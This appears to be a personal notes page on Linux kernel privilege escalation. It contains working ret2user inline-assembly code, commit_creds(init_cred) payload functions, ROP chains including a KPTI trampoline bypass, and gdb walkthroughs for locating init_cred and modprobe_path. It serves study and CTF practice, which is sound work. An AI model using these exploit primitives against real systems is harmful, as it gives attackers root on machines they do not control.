kernel-tips

Basic information

exploit technique

ret2user

Execute a prepared function from kernel space to run the function with kernel privileges. Call functions like commit_cred(&init_cred) to perform LPE. When returning from kernel to user space, the instructions swapgs and iretq should be executed. swapgs swaps the contents of the GS register between kernel and user mode. The iretq instruction pops values from the stack in order and sets them to the RIP, CS, rflags, RSP, SS registers to return to user space. Therefore, the function called from kernel should have the following stack structure before calling iretq to return to user space.

stack
+0x00 +---------------------+ <- rsp
      |         rip         |
+0x08 +---------------------+
      |        cs           | <- user code segment
+0x10 +---------------------+
      |      rflags         | <- user cpu flag
+0x18 +---------------------+
      |        rsp          | <- user stack pointer
+0x20 +---------------------+
      |        ss           | <- user stack segment
+0x28 +---------------------+

Created LPE and ret2user based on https://pawnyable.cafe/linux-kernel/LK01/stack_overflow.html. tips: Assembly functions in C language

static void refuge() {
    asm volatile (
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "movq %%rsp, %2\n"
        "pushfq\n"
        "popq %3\n"
        : "=r"(cs), "=r"(ss), "=r"(rsp), "=r"(rflags)
        :
        : "memory");
}

static void ret2user(unsigned long rip) {
    asm volatile ("swapgs\n");
    asm volatile(
        "movq %0, 0x20(%%rsp)\t\n"
        "movq %1, 0x18(%%rsp)\t\n"
        "movq %2, 0x10(%%rsp)\t\n"
        "movq %3, 0x08(%%rsp)\t\n"
        "movq %4, 0x00(%%rsp)\t\n"
        "iretq"
        :
        : "r"(ss),
          "r"(rsp),
          "r"(rflags),
          "r"(cs), "r"(rip));
}

void lpe() {
    //char *(*pkc)(int) = (void *)prepare_kernel_cred;
    void (*cc)(char *) = (void *)commit_creds;
    //(*cc)((*pkc)(0));
    (*cc)((void *)init_cred);
    ret2user((unsigned long)shell);
}

SMEP can be disabled by updating the CR4 register value, so it's possible to perform ret2user after disabling CR4 through ROP. https://ctf-wiki.org/pwn/linux/kernel-mode/exploitation/rop/bypass-smep/

Kernel Return Oriented Programming

When KPTI is disabled, there's no need to update the CR3 register, so LPE can be achieved by constructing the following chain:

    payload[i++] = kbase + ret;
    payload[i++] = kbase + pop_rdi_ret;
    payload[i++] = init_cred;
    payload[i++] = commit_creds;
    payload[i++] = kbase + swapgs_ret;
    payload[i++] = kbase + iretq_ret;
    payload[i++] = (unsigned long)&shell;
    payload[i++] = cs;
    payload[i++] = rflags;
    payload[i++] = rsp;
    payload[i++] = ss;

Kernel Return Oriented Programming kpti trampoline

To bypass KPTI, swapgs_restore_regs_and_return_to_usermode to construct a ROP chain that bypasses KPTI. Refer to the article for detailed call stacks, and construct the following ROP chain. During the process, there are pop rax and pop rdi instructions, so add 128-bit padding. The symbol swapgs_restore_regs_and_return_to_usermode is publicly available and can be found in /proc/kallsyms.

    payload[i++] = kbase + ret;
    payload[i++] = kbase + pop_rdi_ret;
    payload[i++] = init_cred;
    payload[i++] = commit_creds;
    payload[i++] = kbase + kpti_tranpoline;
    payload[i++] = (unsigned long)&shell;
    payload[i++] = (unsigned long)&shell;
    payload[i++] = (unsigned long)&shell;
    payload[i++] = cs;
    payload[i++] = rflags;
    payload[i++] = rsp;
    payload[i++] = ss;

tips

Identifying kbase

cat /proc/kallsyms | head

Identifying init_cred

Since Linux kernel 6.2, NULL cannot be passed to prepare_kernel_cred. Therefore, LPE using the above method is no longer possible.

commit_creds(prepare_kernel_cred(0))

The solution is simple - use the above method instead.

commit_creds(&init_creds)

However, since the address of init_cred cannot be directly identified from a stripped vmlinux, it's easier to trace from somewhere where symbols are exported. Verified on linux kernel 6.9.12.

init_cred-elixir- Followed the following xRef using elixir:

int kernel_read_file_from_path_initns()
task_struct init_task()
cred init_cred()

When examining the instructions of kernel_read_file_from_path_initns in IDA, the rdi passed to the first call instruction is init_task.fs.

gef> x/50i 0xffffffff9c9f01c0
   0xffffffff9c9f01c0:  endbr64 
   0xffffffff9c9f01c4:  push   rbp
   0xffffffff9c9f01c5:  mov    rbp,rsp
   0xffffffff9c9f01c8:  push   r15
   0xffffffff9c9f01ca:  push   r14
   0xffffffff9c9f01cc:  push   r13
   0xffffffff9c9f01ce:  push   r12
   0xffffffff9c9f01d0:  push   rbx
   0xffffffff9c9f01d1:  sub    rsp,0x30
   0xffffffff9c9f01d5:  mov    QWORD PTR [rsp+0x8],rsi
   0xffffffff9c9f01da:  mov    QWORD PTR [rsp],rdx
   0xffffffff9c9f01de:  mov    DWORD PTR [rsp+0x14],r9d
   0xffffffff9c9f01e3:  mov    rax,QWORD PTR gs:0x28
   0xffffffff9c9f01ec:  mov    QWORD PTR [rsp+0x28],rax
   0xffffffff9c9f01f1:  xor    eax,eax
   0xffffffff9c9f01f3:  test   rdi,rdi
   0xffffffff9c9f01f6:  je     0xffffffff9c9f02d7
   0xffffffff9c9f01fc:  cmp    BYTE PTR [rdi],0x0
   0xffffffff9c9f01ff:  mov    r15,rdi
   0xffffffff9c9f0202:  je     0xffffffff9c9f02d7
   0xffffffff9c9f0208:  mov    rdi,0xffffffff9d60ac30 <- task_init.fs
   0xffffffff9c9f020f:  mov    r14,r8
   0xffffffff9c9f0212:  mov    r13,rcx
   0xffffffff9c9f0215:  call   0xffffffff9cf9f9e0

0xffffffff9d60ab30:     0xffffffff9d638d40      0xffffffff9d638d40
                        [real_cred]             [cred]
0xffffffff9d60ab40:     0x2f72657070617773      0x0000000000000030
                        [comm]
0xffffffff9d60ab50:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ab60:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ab70:     0xffffffff9d6b3140      0xffffffff9d6b2c80
0xffffffff9d60ab80:     0x0000000000000000      0xffffffff9d638ba0
0xffffffff9d60ab90:     0xffffffff9d60c7e0      0xffffffff9d60bfc0
0xffffffff9d60aba0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60abb0:     0x0000000000000000      0xffffffff9d60abb8
0xffffffff9d60abc0:     0xffffffff9d60abb8      0x0000000000000000
0xffffffff9d60abd0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60abe0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60abf0:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac00:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac10:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac20:     0x0000000000000000      0x0000000000000000
0xffffffff9d60ac30:     0x0000000000000000      0x0000000000000000
                        [task_init.fs]

The task_struct looks like this, and from here the offset of init_cred can be determined. According to the task_struct structure, near fs, there exists a string called comm and real_cred and cred that hold init_cred. comm is a distinctive byte sequence, making it quite easy to identify.

	const struct cred __rcu		*real_cred;
	const struct cred __rcu		*cred;

#ifdef CONFIG_KEYS
	struct key			*cached_requested_key;
#endif
	char				comm[TASK_COMM_LEN]; //0xffffffff81e12b80

Identifying modprobe_path

This modprobe_path is also a global variable used in exploits. modprobe_path By rewriting it to a path of a prepared eval script, it can be executed with kernel privileges. Note that modprobe_path was removed in a commit in the latter half of 2024. https://theori.io/blog/reviving-the-modprobe-path-technique-overcoming-search-binary-handler-patch

Since direct identification from a stripped vmlinux is impossible, here's a memo on how to identify modprobe_path.

__request_module has its symbol exported and references modprobe_path, so it should work. Get the address of __request_module from kallsyms and disassemble it with gdb.

The usage location of modprobe_path is in the following validation, and as shown, looking at the cmp BYTE PTR [], 0x0 instruction reveals the address of modprobe_path.

	if (!modprobe_path[0])
		return -ENOENT;

gef> x/50i 0xffffffff9c8eb750
   0xffffffff9c8eb750:  endbr64 
   0xffffffff9c8eb754:  push   rbp
   0xffffffff9c8eb755:  mov    rbp,rsp
   0xffffffff9c8eb758:  push   r13
   0xffffffff9c8eb75a:  push   r12
   0xffffffff9c8eb75c:  mov    r12,rsi
   0xffffffff9c8eb75f:  push   r10
   0xffffffff9c8eb761:  lea    r10,[rbp+0x10]
   0xffffffff9c8eb765:  push   rbx
   0xffffffff9c8eb766:  mov    r13,r10
   0xffffffff9c8eb769:  mov    ebx,edi
   0xffffffff9c8eb76b:  sub    rsp,0x88
   0xffffffff9c8eb772:  mov    QWORD PTR [rbp-0x40],rdx
   0xffffffff9c8eb776:  mov    QWORD PTR [rbp-0x38],rcx
   0xffffffff9c8eb77a:  mov    QWORD PTR [rbp-0x30],r8
   0xffffffff9c8eb77e:  mov    QWORD PTR [rbp-0x28],r9
   0xffffffff9c8eb782:  mov    rax,QWORD PTR gs:0x28
   0xffffffff9c8eb78b:  mov    QWORD PTR [rbp-0x58],rax
   0xffffffff9c8eb78f:  xor    eax,eax
   0xffffffff9c8eb791:  test   dil,dil
   0xffffffff9c8eb794:  jne    0xffffffff9c8eb8e4
   0xffffffff9c8eb79a:  cmp    BYTE PTR [rip+0xdc0a9f],0x0        # 0xffffffff9d6ac240
                                        [modprobe_path]----------------------J
   0xffffffff9c8eb7a1:  je     0xffffffff9c8eb92e

Identifying core_pattern

Assembly functions in C language

The asm() function included in stdlib.h is written as follows:

volatile
- Prevents optimization.
output operand
- Used to return the execution result of assembly instructions to variables.
- Format is "constraint"(variable), for example "=r"(dest) means output value using any register and put that value into variable dest.
- = indicates write-only.
- Reference assembly and output operands with %n (%0,%1,...).
input operand
- Specifies variables to be used within assembly instructions.
- Format is "constraint"(variable), for example "r"(src) means place variable src in any register.
assembly
- Write assembly code.
- %0 etc. used to reference input operands and output operands are continuous from input operands -> output operands.

Last modified: 13 July 2025